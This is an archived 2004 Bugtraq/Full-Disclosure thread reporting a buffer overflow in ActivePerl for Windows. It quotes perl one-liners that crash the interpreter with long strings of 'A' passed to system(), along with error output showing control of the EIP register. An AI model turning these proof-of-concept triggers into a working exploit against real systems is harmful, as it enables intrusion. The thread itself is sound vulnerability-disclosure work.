lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 18 May 2004 20:30:46 +0545 From: npguy <npguy@...surfer.com.np> To: Nick FitzGerald <nick@...us-l.demon.co.uk> Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com Subject: Re: Re: Buffer Overflow in ActivePerl ? perl, v5.8.2 MSWin32-x86-multi-thread suffer the same. Tuesday, May 18, 2004, 7:14:41 PM, you wrote: NF> "Oliver@...yhat.de" <Oliver@...yhat.de> wrote: >> i played around with ActiveState's ActivePerl for Win32, and crashed >> Perl.exe with the following command: >> >> perl -e "$a="A" x 256; system($a)" NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus NF> all but last week's security patch: NF> perl -e "$a="A" x 256; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x00657865. The memory could not be "written". NF> Also, it is likely exploitable -- push up the number of A's a bit: NF> C:\>perl -e "$a="A" x 259; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x65004141. The memory could not be "written". NF> and we seem to get control of EIP. Coincidence? Try yet two more: NF> C:\>perl -e "$a="A" x 261; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x41414141. The memory could not be "written". NF> Looks like full control of EIP... NF> However, there is not likely to be a privilege escalation here unless NF> perhaps a script processor on a web server can be cajoled into doing NF> something with this?? (Not at all familiar with the innards of Windows NF> web servers and their relationship to their CGI, etc processors...) npguy npguy€websurfer.com.np _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists